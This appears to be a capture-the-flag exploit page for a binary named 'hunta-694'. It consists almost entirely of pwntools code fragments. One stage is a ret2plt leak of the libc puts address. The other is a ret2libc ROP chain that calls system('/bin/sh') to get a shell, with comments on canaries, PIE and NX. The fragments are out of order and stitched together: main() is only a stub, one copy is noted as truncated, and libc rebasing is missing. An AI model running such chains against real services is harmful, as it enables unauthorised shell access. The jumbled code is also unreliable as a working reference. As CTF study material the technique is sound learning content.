Hunta-694 ★ Ultimate

# ---- Leak stage: ret2plt ---------------------------------------------
# First overflow: the saved return address is replaced so that puts@plt
# runs with puts@got as its argument, printing the resolved libc address
# of puts, and execution then returns to main for a second round.
# A stack canary would block the overwrite itself; without PIE the
# puts_plt / main_addr values are fixed, which is why no prior leak is
# needed for them. `offset`, `puts_plt`, `main_addr`, `puts_got` and
# `io` are defined in other fragments of this page.
leak_payload = flat(
    b'A' * offset,  # padding up to the saved return address
    puts_plt,       # call puts
    main_addr,      # return to main after the leak
    puts_got,       # argument to puts -> leaks the real puts address
)
io.sendlineafter(b'> ', leak_payload)

# ----------------------------------------------------------------------
# Exploit
# ----------------------------------------------------------------------
def main():
    """Entry point: obtain the target tube via start().

    Only the first statement of the body is visible on this page; the
    leak and ROP stages appear as separate fragments elsewhere on it, so
    nothing beyond the connection setup is reproduced here.
    """
    io = start()

# pwntools context: take arch/bits/endianness from the loaded target
# (`ELF` is the object created in the configuration block, which shadows
# the pwntools class of the same name) and set the terminal command
# pwntools uses when it opens a debugger window.
context.binary = ELF
context.terminal = ['tmux', 'splitw', '-h']

# ---- Final stage: ret2libc ---------------------------------------------
# Second overflow, sent after the leak: `pop rdi; ret` loads the address of
# the "/bin/sh" string into rdi and system() is returned into. An NX stack
# does not stop this chain (no injected code executes); a stack canary
# would block the overwrite. `offset`, `pop_rdi`, `bin_sh`, `system` and
# `io` come from other fragments of this page.
rop_payload = flat(
    b'A' * offset,  # same padding as the leak stage
    pop_rdi,        # pop rdi; ret gadget
    bin_sh,         # address of "/bin/sh" in libc
    system,         # libc system()
)
io.sendlineafter(b'> ', rop_payload)

# ----------------------------------------------------------------------
# Configuration
# ----------------------------------------------------------------------
HOST = '<remote_host>'  # placeholder; set to None for a local run
PORT = None             # placeholder for <remote_port>; None selects a local run
BINARY = './hunta-694'  # path to the binary (if local)
# NOTE: rebinding ELF to the loaded object shadows the pwntools ELF class
# for the rest of the module; the context fragment relies on this name,
# so it is kept as written.
ELF = ELF(BINARY)
# (the page repeats a truncated copy of the leak_payload construction at
#  this point; the complete statement is in the leak-stage fragment)

# ----------------------------------------------------------------------
# Helper functions
# ----------------------------------------------------------------------
def start():
    """Return an I/O tube for the target.

    Connects to HOST:PORT when both are configured; otherwise spawns the
    local BINARY with process().
    """
    if HOST and PORT:
        return remote(HOST, PORT)
    return process(BINARY)

`$ nc <host> <port>`, or a local wrapper script (`run.sh`). Capture traffic with `tcpdump` / `wireshark` or `socat`. Below are the most common vulnerability patterns; mark the ones that actually appear in hunta‑694.

# ---- Step 3: Build final ROP chain --------------------------------
# Gadget and symbol lookup for the ret2libc chain. NOTE(review): the libc
# values are runtime addresses only if libc.address was rebased from the
# leaked puts address in the earlier steps (not shown on this page);
# otherwise they are offsets relative to the library base.
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]  # address of pop rdi; ret
bin_sh = next(libc.search(b'/bin/sh'))             # first "/bin/sh" in libc
system = libc.symbols['system']                    # libc system()